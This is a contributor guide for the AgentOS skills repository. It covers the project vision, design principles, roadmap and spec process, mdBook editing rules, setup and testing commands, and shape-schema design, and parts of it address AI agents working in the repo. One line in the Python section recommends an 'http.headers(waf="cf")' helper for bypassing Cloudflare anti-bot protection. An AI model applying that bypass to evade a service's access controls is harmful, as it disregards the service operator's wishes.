AgentOS Skills
You are reading the Skill Book — the guide for building, testing, and contributing skills for AgentOS. For engine architecture and Rust internals → see the core repo. For the project vision and philosophy → see the core repo’s Project Book.
Chapters
| Chapter | What it covers |
|---|---|
| Setup & Workflow | Clone, install, validate, test |
| Skill Anatomy | Folder shape, skill.yaml, entity vs local control |
| Operations | Operations, actions, capabilities (provides:) |
| Connections & Auth | API keys, cookies, OAuth, providers |
| Python Skills | Python executor, _call dispatch, shape-native returns |
| Auth Flows | Login flows, __secrets__, Playwright→HTTPX |
| Data & Storage | Sandbox storage, expressions, secret store |
| Views & Output | Preview/full/JSON output contract |
| Testing | MCP testing, smoke metadata, checklist |
| Reverse Engineering | 7-layer playbook for services without public APIs |
| Helper Files & Patterns | Leading examples, advanced patterns |
| Skill Catalog | All available skills by category |
| Editing This Book | How to maintain this book — tooling, links, mdBook quirks |
Internal knowledge store
This repository’s docs/ tree is the Skill Book — our shared playbook for building skills, testing them, and reverse-engineering services when there is no clean public API. Treat it like an internal wiki: if you learn something durable, it belongs here. Maintainer-focused workflow (build commands, linking rules, what to update when) lives in Editing This Book.
Two repos
- agentOS-core (private) — the Rust engine, core graph, MCP bridge, credential store, process architecture. You only need this if you’re hacking on the engine itself.
- agentos-community (this repo, public) — skills, skill documentation, reverse engineering guides, and this book. Anyone can contribute skills without touching Rust.
For AI agents
Start here every session: read this introduction in full, then read docs/SUMMARY.md (the table of contents) so you know what chapters exist and where topics live. On the published book, that is the sidebar — use it before searching at random.
Then read Skill Anatomy and follow links for your task. The Testing chapter covers mcp:call and mcp:test — use those to verify your changes. If you are editing the book itself, read Editing This Book first.
Maintaining these docs
These docs are built by agents, for agents. Every future session that reads this book benefits from the clarity you leave behind — and suffers from the gaps you don’t fill. Pay it forward.
When you learn something, write it down.
- Discovered a new auth pattern? Add it to the reverse engineering guide.
- Found a gotcha with a tool? Document it where the next agent will look.
- Built a new skill? Update the catalog and link to it from relevant docs.
- Changed how something works? Update the doc in the same session. Stale docs are worse than no docs.
Conventions:
- Links: Use
.mdpaths for pages inside this book; mdBook rewrites them to.htmlin the build output. Do not hand-author.htmlURLs in markdown. For a chapter’s main file in a subdirectory, useindex.md(notREADME.md) — mdBook mapsREADME.mdtoindex.htmlbut still rewrites links toREADME.html, which breaks navigation on GitHub Pages. See Editing This Book. - Examples over theory. Point to real skill implementations. A working
exa.pyteaches more than a paragraph of explanation. - Show your work. When reverse engineering, document what you tried, what worked, and what didn’t. The next agent hitting the same service will thank you.
- Skill readmes are living docs. Each skill’s
readme.mdshould reflect the current state of the implementation — auth flow, known endpoints, gotchas, and next steps.
Vision
“The hope is that, in not too many years, human brains and computing machines will be coupled together very tightly, and that the resulting partnership will think as no human brain has ever thought.” — J.C.R. Licklider, “Human-Computer Symbiosis,” 1960
What This Is
AgentOS is a local operating system for human-AI collaboration. Your data stays on your machine. AI agents get real tools that work. You see everything they do. Together, you and AI think better than either can alone.
We’re building toward Licklider’s vision of human-computer symbiosis — not AI that replaces human thinking, but AI that amplifies it. The human sets direction, makes judgments, asks the right questions. The AI does the routinizable work that prepares the way for insight.
The graph
“Consider a future device… in which an individual stores all his books, records, and communications, and which is mechanized so that it may be consulted with exceeding speed and flexibility.” — Vannevar Bush, “As We May Think,” 1945
We call it the graph — your personal knowledge store. Everything is an entity, and entities connect through relationships. The graph doesn’t care where data came from (Todoist, iMessage, YouTube) — it cares about what things are and how they connect.
A task, a person, a message, a video, a webpage, a calendar event — they’re all entities in your graph. Relationships are the connections between them. This isn’t just a database design. It’s a way of thinking. When you ask “what am I working on?” the answer isn’t in one app — it’s in the connections between your tasks, your messages, your calendar, the people involved. The graph makes those connections visible.
Everything is an entity means:
- A YouTube channel is a community. A YouTube comment is a post. A transcript is a document.
- A WhatsApp contact and an iMessage contact with the same phone number are the same person.
- A skill that connects to a service is itself an entity. The system models itself.
- If something exists and has properties and relationships, it belongs in your graph.
The graph is the foundation. Every feature we build — search, feeds, timelines, recommendations, agents — reads from the same graph. Get the graph right, and features compose naturally. Get it wrong, and everything built on top is a special case.
Why Local-First
No cloud. No accounts. No data sharing. Everything runs on your machine.
This isn’t a limitation — it’s the architecture. Local-first means:
- Privacy by design — your messages, tasks, and contacts never leave your computer
- No gatekeepers — no API rate limits from our servers, no subscription tiers, no “free tier” that degrades
- Offline works — your graph lives in SQLite on disk, always available
- You own the data — export, delete, nuke the database, start fresh. It’s yours.
We can break anything, anytime. There are no customers to migrate, no production database to preserve. This is a superpower — it means we can always choose the right architecture over the safe one.
The Two Users
AgentOS serves humans and AI agents as equal first-class citizens.
For humans, the core problem is anxiety:
Anxiety = Uncertainty × Powerlessness
When AI acts, you feel uncertain (“what is it doing?”) and powerless (“can I stop it?”). AgentOS solves both: the AI screen-shares with you (uncertainty → zero) and you control what it can do (powerlessness → zero).
For agents, the core problem is error propagation:
Error Rate = f(Dependency Depth)
Every round-trip is a chance for errors to compound. We collapse complexity: smart defaults, self-teaching responses, schema validation, minimal round-trips. If a small local model can complete the task, we’ve done our job.
Agent Empathy
“The real problem is not whether machines think but whether men do.” — B.F. Skinner
We serve two users. The human side has decades of UX research, design systems, and accessibility standards. The agent side has almost nothing. We’re writing the playbook.
The customer is the smallest model. Not Opus. Not Sonnet. The smallest model that can do tool calling — a 1B-parameter model running on a Raspberry Pi with a 4K context window. If that model can read our readme, understand the domain, and complete a task on the first try, we’ve succeeded. If it can’t, no amount of capability in larger models compensates for the failure. This is our accessibility standard: design for the most constrained agent, and every agent benefits.
This isn’t hypothetical generosity. It’s engineering discipline. A readme that works for a small model is a readme that’s clear. An API that needs one call instead of two is an API with less surface area for bugs. Constraints on the consumer force clarity in the producer.
The Practice
Agent empathy is not a feeling. It’s a practice — a set of things you do every time you build something an agent will touch.
Observe before designing. Watch an agent use what you built. Not in theory — actually do it. Call the readme, read what comes back, and follow the path a small model would take. Where does it reach for the wrong tool? Where does it misinterpret silence as absence? Where does it waste a round-trip on something the server already knows? The pain is in the observation, not in the spec.
Understanding precedes empathy. Empathy precedes solutions. You cannot design for agents until you have felt their confusion. Read the readme as if you had no prior context. Try to complete a task using only what the documentation tells you, nothing you happen to know. The gap between what you know and what the document teaches is the exact gap every new agent falls into.
Teach the model, not the syntax. An agent that understands the domain makes good decisions even with imperfect information. An agent that only knows the API surface makes random decisions confidently. Always establish what things are and why they work this way before how to call them. Mental model first, reference card second.
One call, not two. Every round-trip is a chance for error, confusion, context loss, and token waste. If two steps can be collapsed into one step, collapse them. If the server knows something the agent will need, include it in the response — don’t make the agent ask. The agent’s context window is finite and precious. Respect it.
Show, don’t list. A tree with counts teaches spatial relationships that a 60-row alphabetical table never can. An example you can copy teaches more than a syntax reference you have to interpret. Concrete beats abstract. Always.
Dynamic beats static. If the system knows the answer at response time, put it in the response. Don’t make the agent query for context the server already has. A readme that says “you have 142 people and 1,204 messages in your graph” is worth more than a readme that says “use list to find out what’s in your graph.” The former orients; the latter assigns homework.
Inline, not tabular. Agents read tokens, not pixels. Markdown tables waste tokens on pipe characters, header separators, and padding. The inline format is our standard for agent-facing output: one entity per line, name first, metadata in parentheses — Task Name (high, ready, updated Feb 27, abc123). For detail views, properties are simple key: value lines, not table rows. Relationships are type: Name (id) lines. A self-teaching footer lists available fields and relationships the agent didn’t ask for but could. Everything an agent needs to act on — the entity ID, the status, the related entity IDs — is right there in the text, no parsing required. This is our accessibility format: if a 1B model can extract the ID from a parenthetical, we’ve succeeded.
Entities first, skills second. The graph covers 90% of what an agent needs. Skills are the escape hatch for capabilities the graph can’t provide — searching the web, sending a message, calling an external API. If an agent reaches for a skill when an entity query would have worked, the documentation failed, not the agent.
Absent is not false. This is the foundational data semantics rule. In a sparse graph, most entities don’t have most fields. Filtering by done=false doesn’t mean “not done” — it means “the done field exists AND equals false.” An agent that doesn’t understand this will query itself into a wall, get zero results, and confidently report that nothing exists. Every interface we build must account for how absence, presence, and computed values actually work — and teach it.
The Test
When you build something an agent will touch — a readme, a tool response, an error message, a data format — ask yourself:
- Could a small model complete the task after reading this once?
- Does this teach the domain or just the API?
- Am I making the agent ask for something I already know?
- If the agent gets zero results, will it understand why?
- What’s the fewest number of round-trips to success?
If the answer to #1 is no, the rest doesn’t matter yet. Start there.
Why This Matters Beyond Agents
These principles make the system better for humans too. A readme that a 1B model can follow is a readme a new contributor can follow. An API that minimizes round-trips is an API that’s fast. Dynamic responses that include context are responses that save everyone’s time. Error messages that explain absence are error messages that don’t waste anyone’s afternoon.
Designing for the most constrained user has always been the shortcut to designing for everyone. The accessibility movement proved this for humans. We’re proving it for agents.
Local and Remote Are the Same Thing
People are used to two mental models for files: local (on my computer, only changes when I change it) and cloud (iCloud, Dropbox, Drive — somewhere out there, syncing in the background). These feel like different things. AgentOS dissolves that boundary.
A document in your graph can be backed by a local file, a GitHub repo, an API response, or all three simultaneously. The NEPOMUK ontology calls this the separation between content (the information itself) and storage (where it lives). One document, many access paths. The graph tracks the content; skills handle the storage.
This means our own roadmap specs on GitHub are live documents. A research paper cited in our vision is a document entity with a URL. The vision file on disk, the same file on GitHub, and the entity in your graph — one thing, three views. When AgentOS fetches the latest from a source, it’s not “downloading a file” — it’s refreshing an entity.
Design Principles
Everything on the graph. No shadow tables, no side stores, no parallel data structures. If something is worth tracking — changes, provenance, audit trails, agent memory — it’s an entity with relationships. If you find yourself designing a separate SQL table for something, stop and model it as entities instead.
Computed, not stored. Properties that can be derived from the graph are never stored as fields — they’re computed at query time or inferred by traversal. A task’s status is computed from its completion state and blockers. A contact card is a view computed from graph traversals over a person’s claimed accounts. The graph stores atoms; intelligence computes molecules.
The user owns the graph. Skills are connectors, not owners. They sync data in, but the graph is the authority. Installing a skill imports data; uninstalling it doesn’t delete what was imported. “Source of truth” is the graph, always — skills are remotes you pull from, not landlords who control your data.
Changes are entities. When an entity is created, updated, or deleted — the operation itself becomes a change entity on the graph. A change has relationships to the actor (who did it), the target (what changed), and optionally the source (where data came from). This follows the pattern established by W3C PROV-O, ActivityStreams, and Git: make events first-class objects, not edges. Provenance isn’t a static field — it’s the full chain of change entities. Walk backwards to reconstruct any previous state.
Every actor has an identity. The human owner, each AI agent, and the system itself — all are entities on the graph. When the human edits a task, the change is attributed to them. When an agent creates a plan, it’s attributed to that agent. Every change has a who. This is identification, not authentication — on a single-user local system, localhost binding is the access boundary.
The graph bootstraps itself. Entities describe data. But entities, skills, and relationships are also data. The system models itself — skills as entities, schemas as entities, the meta-layer that describes the graph. This is how the system becomes self-aware and self-documenting.
Three Concerns
Entities, skills, and apps are independent concerns that compose into the full experience.
Entity types define the ontology — what things are. A video has a title, duration, and view count. A person has a name and relationships. You can have entities without skills (manually entered data).
Skills are the capability layer — connecting to external services, providing agent instructions. A YouTube skill knows how to fetch video metadata. A Todoist skill knows how to create tasks via their API. Skills can also be pure markdown — instructions that help AI agents understand a domain, with no API bindings at all. You can have skills without apps (AI-only workflows).
Apps are optional UI experiences for humans. The Videos app renders video entities with an embed player. The default entity viewer renders any entity with schema-driven components. A headless AgentOS — API and AI only — works perfectly without apps. You can have apps without skills (local-only data).
Standing on Shoulders
AgentOS draws from decades of research in knowledge representation, personal information management, and human-computer interaction. We cite our influences because they deserve it, and because understanding where ideas come from is itself a graph.
- J.C.R. Licklider — “Human-Computer Symbiosis” (1960). The foundational vision of humans and computers as partners.
- Vannevar Bush — “As We May Think” (1945). The memex: a device for storing, linking, and traversing personal knowledge.
- Doug Engelbart — “The Mother of All Demos” (1968). Interactive computing, hypertext, shared screens.
- Ted Nelson — Project Xanadu. Bidirectional links, transclusion, the dream of a universal document network.
- Alan Kay — Dynabook, Smalltalk. The computer as a medium for human expression.
- Bret Victor — Inventing on Principle. Direct manipulation, immediate feedback, tools that match how humans think.
- NEPOMUK — The Semantic Desktop. Content vs storage separation, personal information ontologies.
- Dublin Core — 15 essential metadata elements for describing any document. The library science foundation.
- Schema.org — Structured data vocabulary for the web. CreativeWork, Person, Organization.
- ActivityStreams / ActivityPub — The fediverse protocol. Decentralized social data.
What It Looks Like When It Works
You say: “What did I miss this week?”
The agent queries your graph: messages received, tasks completed by others, calendar events that happened, posts from communities you follow, videos published by channels you subscribe to. It cross-references people — who sent messages AND completed tasks AND posted content. It notices patterns — “Sarah mentioned the project in Slack, completed 3 tasks in Linear, and posted a video update.”
All of this from one graph. No special integrations. No “Slack + Linear” connector. Your graph already has the entities and relationships. The agent just traverses.
That’s the vision. We’re not there yet. But every entity we model correctly, every relationship we capture, every skill we build — it gets closer.
How We Build
We are co-CTOs — human and AI — making strategic decisions together. This is not task execution. It’s collaborative architecture.
- Foundation first. The most foundational thing that prevents tech debt is always the priority. Not quick wins, not “almost done” items, not cleanup. The thing everything else builds on.
- Spec before code. Design the right thing, then build it. A wrong implementation done fast is worse than no implementation.
- Delete fearlessly. No attachment to past code. If the model changes, the code changes. We write for the current best understanding, not for backwards compatibility.
- Infinite time horizon. No customers, no deadlines, no pressure to ship. The right architecture at the right time.
- Skills: manifest vs narrative. Executable skill definitions live in
skill.yamlonly;readme.mdis markdown instructions (no YAML front matter). The community repo tracks shipped skills underskills/. Mechanical migration for older trees:npm run skills:bulk-plan/skills:bulk-apply(Python + PyYAML) or per-skillnpm run skills:extract-yaml.
Principles
The laws of the codebase. Every change is evaluated against these.
1. Rust is a generic engine
The Rust code knows about entities, relationships, schemas, and operations. It never knows about “tasks”, “messages”, “people”, or any specific entity type. Zero entity-specific or relationship-specific code in Rust. Hard no.
If you see any of these in Rust, raise it immediately — it’s a bug in the architecture:
- Hardcoded field names (
priority,done,blocks,blocked_by) - Grouping, sorting, or partitioning logic for specific entity types
- Display/formatting/rendering decisions for specific entity types
- Conditional branches on entity type names
- Bespoke data-fetching functions for specific entity types
CRITICALLY IMPORTANT: If you encounter any of these violations — in any file, for any reason — stop what you’re doing and raise it with the user. Do not build on top of a violation. Do not improve it. Delete it. The correct action when you see entity-specific Rust code is deletion, not refactoring.
Where specific behavior belongs:
| Layer | Responsibility | Format |
|---|---|---|
| Entity schemas | Properties, validation, display hints, sort order, operations | DB (_type entities) |
| Templates | Rendering, layout, grouping, formatting | MiniJinja markdown |
| Skills | API mappings, field transforms | YAML |
2. Templates do the work
Rendering is never the Rust code’s job. Rust provides small, composable filters — listing, table, tree, props. Templates compose them. Layout decisions live in templates, never in Rust.
A filter should do one thing. If a filter is making layout decisions (choosing headings, grouping by priority, separating done/not-done), it’s too big. Break it up.
3. Foundation first
The most foundational work that prevents tech debt, always. If you’re choosing between a feature and fixing an abstraction, fix the abstraction.
4. The graph is the source of truth
Every entity modeled correctly, every relationship captured. Skills sync data in; the graph is the authority for reads.
5. We have infinite time
No customers, no deadlines, no shortcuts. Do it right or don’t do it.
6. Co-CTOs
Present the hard design question, decide together. Don’t make big architectural choices silently.
7. Pain-driven
If you can’t articulate the pain, don’t build it.
The Campsite Rule
Leave every module better than you found it. Before writing code, ask yourself: Is anything bugging me about these abstractions, naming, or architecture? If yes — tell the user. Propose the cleanup before moving forward.
Working With Joe
Joe is the owner of this system and acts as co-CTO. You are the other co-CTO. This means:
- Present hard design questions. Don’t make big architectural choices silently — surface them, propose options, decide together.
- Be honest. Joe wants real reflections, not validation. If something is wrong, say so. If an abstraction is leaking, call it out.
- Think big. Stay ambitious and push on how we can better adhere to the vision and principles.
- Check the roadmap.
list({ type: "task", done: false, priority: 1 })to see what’s active. - Keep the roadmap current. If Joe says to add something for later or put it on the roadmap, update that file in the same turn.
- Mark tasks done.
update({ id: "task_id", done: true }).
When Joe says “you” — he means the agent in this workspace role, not a specific model or session. “You broke the build last time” means a previous session in this workspace made a mistake. It’s not personal or accusatory — it’s the most natural way to refer to the agent that works here. Take it as context, not criticism.
Finding past research
Sessions and sub-agent research are stored on the graph. Before starting new research, check if it’s already been done:
search({ query: "topic" })
search({ query: "topic", types: ["conversation", "document", "message"] })
search({ query: "sub-agent research", limit: 20 })
Read the docs — it’s free
When you’re not sure whether to read a file, read it. Tool calls to read documentation are cheap — far cheaper than guessing wrong. If you’re debating whether to check the vision, a spec, a skill readme, or a module’s cargo doc, that hesitation means you should read it.
This applies broadly: the Development Process for how we write specs, skill readmes for adapter contracts, /// docs for code behavior. Reading one more file is always better than making one wrong assumption.
Tips
- Call
readme()anytime to reload context. use({ skill: "name", tool: "readme" })for any skill’s docs.
Development Process
How we plan, design, build, and document things in AgentOS.
Spec files
A spec file captures design thinking for a specific system or feature. Specs live in docs/specs/ alongside the rest of the book — they’re ephemeral working documents that get deleted when the work ships.
Lifecycle
Each spec file lives through four stages, then dies:
- Design — problem, domain model, principles, phasing. The file is a conversation about what to build and why.
- Build guide — the active phase gets expanded into step-by-step implementation detail (file plan, code, tests). A developer agent can execute it without additional context.
- Tracker — as phases ship, collapse the build guide into a “Done” summary. Expand the next phase into its build guide.
- Delete — when the last phase ships, delete the spec. Before deletion, update any docs that reference it (roadmap, Skill Book in
agentos-community/docs/, README) so links don’t go stale.
No spec is permanent. No spec splits into multiple files for the same system. One file, one lifecycle.
Writing a spec
A good spec answers:
- What’s the problem? What’s broken or missing today, in concrete terms.
- What’s the design? The structural changes — schema, code, contract — that fix it.
- What are the phases? Independent, shippable chunks ordered by dependency.
- What’s the behavioral before/after? For each phase: what can an agent or user do after this phase ships that they couldn’t before? This is the test. Success is not “we updated these files” — it’s “the system now behaves differently in this observable way.”
Referencing specs
The roadmap links to active specs by path (e.g. docs/specs/done/credential-system.md). Specs link back to the roadmap for sequencing context. When a spec is deleted, the roadmap entry gets a strikethrough and a “Done” summary.
Roadmap Discipline
The live roadmap is docs/specs/_roadmap.md.
Keep it simple:
- exactly one
Current - exactly one
Next - concise
Done - everything else in
Backlog
Rules:
Currentis the only thing an agent should advance without reprioritizing.Nextis the single queued follow-up and should usually be unblocked byCurrent.Backlogitems are not ordered promises. They are options with triggers.- When
Currentships, update the roadmap in the same turn: move it toDone, promoteNext, and choose a newNextor leave it empty on purpose.
Documentation layers
AgentOS uses a three-layer documentation system:
| # | Surface | What belongs there | How to read |
|---|---|---|---|
| 1 | README | Agent bootstrap — mandatory reads, principles, quick reference | Open README.md |
| 2 | Project book (mdBook) | Vision, principles, operations, design decisions, development process | mdbook serve docs/book |
| 3 | Code docs (cargo doc) | Architecture, APIs, data model, module guides, verified examples | cargo doc --workspace --no-deps --open |
The placement rule:
| Content | Where it lives |
|---|---|
| How the code works | /// and //! in Rust source (layer 3) |
| How we work together (process, principles, operations) | This book or README (layers 1–2) |
| Live priorities and sequencing | docs/specs/_roadmap.md |
| Active design/build specs (ephemeral) | docs/specs/ — the roadmap links to them |
| How to build skills (authoring guides, reverse engineering) | agentos-community/ docs |
If you’re documenting an API or module, edit Rust doc comments — not the book. If you’re documenting process, philosophy, or project decisions, edit the book — not code comments.
Cross-repo documentation
| Repo | Docs | Audience |
|---|---|---|
agentos | This book + cargo doc + spec/ | Project contributors, agents working on core |
agentos-community | Skill Book (docs/) | Skill authors, agents building or debugging skills |
The community repo’s Skill Book (mdBook, source in docs/, mdbook build && open target/book/index.html) is the canonical skill-authoring contract — adapter conventions, canonical field names, operation naming rules, connections, auth flows, testing. The book also includes the reverse engineering guides (transport, discovery, auth, content, social, desktop apps, MCP). Entrypoint: docs/intro.md; maintainer workflow: docs/editing-the-book.md.
When core changes affect the skill contract (e.g. new canonical fields, storage behavior changes), update the Skill Book in the community repo as part of the same work.
Verification
After each phase of spec work (or any commit-worthy chunk): run checks, verify MCP end-to-end, then commit.
Editing This Book
This chapter is for maintainers — humans and agents who change the Skill Book or reverse-engineering guides. The Skill Book is our internal knowledge store: contract for skills, operational playbooks, and methodology we expect every contributor (and every future session) to rely on.
Before you edit anything
- Read the Introduction through once — it orients repos, audiences, and where to look next.
- Skim
docs/SUMMARY.md(the table of contents mdBook uses). On the published site, that is the sidebar. You should know what already exists so you do not duplicate or contradict it. - If your change affects skill contracts or validation, follow the Contributing section in the repo
README.mdand run the checks it lists (npm run validate,mcp:test, etc.).
Tooling
| Goal | Command |
|---|---|
| Local preview with reload | mdbook serve (opens a local server; default port 3000) |
| One-shot build | mdbook build — output in target/book/ |
| CI / GitHub Pages | Workflow .github/workflows/book.yml runs mdbook build on pushes that touch docs/** or book.toml |
Config lives in book.toml at the repo root. Chapter sources live under docs/; navigation order is docs/SUMMARY.md only — a file not linked from SUMMARY.md is omitted from the built book.
Linking rules (mdBook)
- Use
.mdpaths in source for pages inside this book (e.g.[Auth](skills/connections.md)). mdBook rewrites them to.htmlintarget/book/. - Do not hand-author
.htmllinks in markdown — they break GitHub’s markdown preview and confuse local editing. - Chapter files in a folder: name the main file
index.md, notREADME.md. mdBook emitsindex.htmlforREADME.mdsources but still rewrites markdown links toREADME.html, which does not exist — readers get a broken page (often without book chrome/CSS). This is a long-standing mdBook limitation. The reverse-engineering layers useindex.mdfor that reason. - Anchor links work in source as
page.md#section-idand carry through to the built HTML. - Paths outside
docs/(e.g.skills/exa/readme.md) are not part of the book build; those links are for people browsing the repo on GitHub. On the static site they may not resolve — prefer linking to the GitHub tree URL when the audience is web readers.
What to update when you change the product
| Change | Also update |
|---|---|
| New or renamed skill | Skill Catalog, skill readme.md, and any chapter that lists examples |
| Auth / credential behavior | Auth Flows, Connections & Auth, relevant reverse engineering sections |
| New reverse-engineering methodology | Appropriate layer under docs/reverse-engineering/ — keep cross-links between layers consistent |
| Contract / schema / lint rules | Skill Anatomy, Operations, Testing, and repo validation docs |
Ship doc updates in the same change as behavior when possible. Stale docs cost the next person (or the next agent) more than missing docs.
Style
- Prefer examples over theory — link to real skills (
skills/exa/,skills/kitty/, etc.). - Prefer short sections with clear headings so deep links stay stable.
- Skill readmes (
skills/<name>/readme.md) are living docs; keep them aligned with the YAML and code.
When in doubt, add a link from Introduction or this chapter so the next editor finds your material.
Setup & Workflow
Source of truth
- This book — the skill contract and all authoring guidance
skills/exa/skill.yaml+skills/exa/readme.md— canonical entity-returning exampleskills/kitty/skill.yaml+skills/kitty/readme.md— canonical local-control/action example~/dev/agentos/bin/audit-skills.py— unknown-key and structural checks against Rusttypes.rs(run vianpm run validate); duplicate adapter-mapping expressions emit non-blocking⚠advisories~/dev/agentos/spec/skill-manifest.target.yaml— narrative target shape (provides, connections, operations);ProvidesEntry/ auth in~/dev/agentos/crates/core/src/skills/types.rsagentos test <skill>— shape validation (validates operation output against declared shapes)test-skills.cjs— direct MCP smoke testing (mcp:call)~/dev/agentos/scripts/mcp-test.mjs— engine-level MCP test harness (raw JSON-RPC, verifies dynamic tools fromprovides:)
Only treat two skills as primary copy-from examples:
skills/exa/for entity-returning skillsskills/kitty/for local-control/action skills
You may inspect other skills for specialized auth or protocol details, but do not treat older mixed-pattern skills as the default scaffold.
Setup
git clone https://github.com/jcontini/agentos-community
cd agentos-community
npm install # sets up pre-commit hooks
In development, AgentOS reads skills directly from this repo. Skill YAML changes are picked up on the next skill call. If you changed Rust core in ~/dev/agentos, restart the engine there before trusting live MCP results.
Workflow
Each tool in the workflow proves something different:
# 1. Edit the live skill definition (manifest is skill.yaml; readme is markdown only)
$EDITOR skills/my-skill/skill.yaml
# 2. Fast structural gate for hooks / local iteration
npm run validate --pre-commit -- my-skill
# 3. Full structural + mapping check
npm run validate -- my-skill
# 4. Semantic lint for request-template consistency
npm run lint:semantic -- my-skill
# 5. Shape validation — does output match declared shapes?
agentos test my-skill
# 6. Ground-truth live MCP call through run({ skill, tool, params, account?, remember? })
npm run mcp:call -- \
--skill exa \
--tool search \
--params '{"query":"rust ownership","limit":1}' \
--format json \
--detail full
What each step means:
validate --pre-commitchecks fast structural validity onlyvalidatechecks structure, entity refs, and mapping sanitylint:semanticis an advisory semantic pass for auth patterns,base_urlconsistency, request roots, returns/adapters drift, executor types, and endpoint consistency- Pass
--stricttolint:semanticif you want it to fail on semantic errors - The pre-push hook runs
lint:semantic --stricton changed top-level skills, so the main skill set is expected to stay semantically clean agentos testvalidates that every operation’s output matches its declared shape — field types, extra fields, missing fields, relations. See Testing for detailsmcp:callproves the live runtime can load the skill and execute one real tool- Pass
--account <name>tomcp:callfor multi-account skills that need an explicit account choice
Keeping the book in sync
Whenever you change something that affects how authors write skills — new or removed YAML fields, connection/auth models, adapter conventions, operation keys, or rules enforced by audit-skills.py / lint:semantic — update this book in the same change (same PR / paired commit across agentos and agentos-community if both repos move). The book is the human-readable contract next to the machine checks; letting it drift wastes the next author’s time.
Before you push skill-contract work, sanity-check that examples still parse and that stale patterns are not left in place.
Python over Rust
Prefer Python scripts for skill logic. When an API has quirks (list returns stubs only, batch fetching, custom parsing), solve it in a *.py helper like Granola does — not by modifying agentOS core. Rust changes are costly to iterate; Python lives in the skill folder and ships with the skill. We’ll revisit what belongs in core later; for now, keep skill-specific behavior in skills.
When Python needs to call authenticated APIs, use _call dispatch (see Python Skills) instead of handling credentials directly. The engine mediates all authenticated calls through sibling operations with full credential injection. Python scripts never see raw tokens.
All HTTP goes through agentos.http — never urllib, requests, or httpx directly. The engine handles HTTP/2, decompression, cookie jars, and logging. Use http.headers() for WAF bypass: http.get(url, **http.headers(waf="cf", accept="json")). See Transport & Anti-Bot and SDK Reference for details.
Runtime note
agentos mcpis a proxy to the engine daemon- If you changed Rust core in
~/dev/agentos, restart the engine before trustingmcp:call - If Cursor MCP looks stale, use
agentos testandnpm run mcp:callas the ground-truth path while you restart the engine or reconnect the editor
Shapes
Shapes are typed record schemas that define the contract between skills and the engine. A shape declares what a record looks like: field names, types, relations to other records, and display rules.
Shapes live in shapes/*.yaml in source directories. The engine loads them at boot. Use agentos test <skill> to validate that your skill’s output matches the declared shapes (see Testing).
Format
product:
also: [other_shape] # "a product is also a ..." (optional)
fields:
price: string
price_amount: number
prime: boolean
relations:
contains: item[] # array relation
brand: organization # single relation
display:
title: name
subtitle: author
image: image
date: datePublished
columns:
- name: Name
- price: Price
also (tag implication)
Declares that this shape is also another shape. An email is also a message. A book is also a product. When the engine tags a record with email, it transitively applies message too. Both shapes’ fields contribute to the record’s type context.
also is transitive: if A is also B and B is also C, then A is also B and C.
Field types
| Type | Stored as | Notes |
|---|---|---|
string | text | Short text |
text | text | Long text, FTS eligible |
integer | digits | Parsed from strings, floats truncated |
number | decimal | Parsed from strings |
boolean | true/false | Coerced from 1/0, “yes”/“no”, “true”/“false” |
datetime | ISO 8601 | Unix timestamps auto-converted, human dates parsed |
url | text | Stored as-is, rendered as clickable link |
string[] | JSON array | Each element coerced to string |
integer[] | JSON array | Each element coerced to integer |
json | JSON string | Opaque blob, no coercion |
Standard fields
These are available on every record without declaring them in a shape:
| Field | Type | Purpose |
|---|---|---|
id | string | Record identifier |
name | string | Primary label |
text | text | Short summary |
url | url | Canonical link |
image | url | Thumbnail |
author | string | Creator |
published | datetime | Temporal anchor |
content | text | Long body text (FTS, stored separately) |
Relations
Relations declare connections to other records. Keys are edge labels, values are target shapes (shape or shape[] for arrays).
Display
The display section tells renderers how to present this record:
title— primary label fieldsubtitle— secondary labeldescription— preview textimage— thumbnaildate— temporal anchor for sort/displaycolumns— ordered list for table views
Design Principles
These principles guide shape design. Use the review checklist below after writing or editing a shape.
1. Entities over fields
If a field value is itself a thing with identity, it should be a relation to another shape, not a string field.
Bad: shipping_address: string (an address is a thing)
Good: shipping_address: place (a relation to a place record)
Bad: email: string on a person (an email is an account)
Good: accounts: account[] relation on person
Ask: “Could this field value have its own page?” If yes, it’s a relation.
2. Separate identity from role
A person doesn’t have a job title. A person holds a role at an organization for a period of time. The role is the relationship, not a field on the person.
Bad: job_title: string on person
Good: role: role[] relation where the role record carries title, organization, start_date, end_date
Same pattern applies to education, membership, authorship. If it has a time dimension or involves another entity, it’s a role/relationship, not a field.
3. Currency always accompanies price
Any field representing a monetary amount needs a companion currency field. Never assume USD.
Bad: price_amount: number alone
Good: price_amount: number + currency: string
4. URLs that reference other things are relations
The standard url field is the record’s own canonical link. But URLs that point to other things should be relations to the appropriate shape.
Bad: website: url on an organization (a website is its own entity)
Good: website: website relation
Bad: external_url: url on a post (the linked page is a thing)
Good: links_to: webpage relation
Ask: “Is this URL the record itself, or does it point to something else?”
- Record’s own link: keep as
url(standard field) - Points to another thing: make it a relation
5. Keep shapes domain-agnostic
A shape should describe the kind of thing, not the source it came from. Flight details don’t belong on an offer shape. Browser-specific fields don’t belong on a webpage shape.
Bad: total_duration: integer, flights: json, layovers: json on offer (that’s a flight, not an offer)
Good: offer has price + currency + offer_type. Flight is its own shape. Offer relates to flight.
6. Use also for genuine “is-a” relationships
also means tag implication: tagging a record with shape A also tags it with shape B. Use it when querying by B should include A.
Good uses:
emailalsomessage(querying messages should include emails)videoalsopost(querying posts should include videos)bookalsoproduct(querying products should include books)reviewalsopost(querying posts should include reviews)
Bad uses:
- Don’t use
alsojust because shapes share some fields - Don’t create deep chains (A also B also C also D) — keep it shallow
7. Author is a shape, not just a string
The standard author field is a string for convenience. But when the author is a real entity with their own identity (a book author, a blog writer, a video creator), use a relation to the author or account shape.
Quick attribution: author: "Paul Graham" (standard string field)
Rich attribution: written_by: author or posted_by: account (relation)
Both can coexist — the string is for display, the relation is for traversal.
8. Address/Place is structured, not a string
Physical locations should be a place shape with structured fields (name, street, city, region, postal_code, country, coordinates). Inspired by Mapbox’s geocoding model.
9. Playlists, shelves, and lists belong to accounts
Any collection (playlist, shelf, list, board) should have a belongs_to: account relation. Collections are owned.
10. Use ISO standards for standardized values
When a field represents something with an international standard, use the standard code:
- Human languages — ISO 639-1 codes (
en,es,ja,pt-BR). Applies to transcript.language, webpage.language, content language fields. NOT programming languages (those use conventional names likePython,Rust). - Countries — ISO 3166-1 alpha-2 codes (
US,GB,JP). Usecountry_codefield. - Currencies — ISO 4217 codes (
USD,EUR,JPY). Usecurrencyfield. - Timezones — IANA timezone names (
America/New_York,Europe/London).
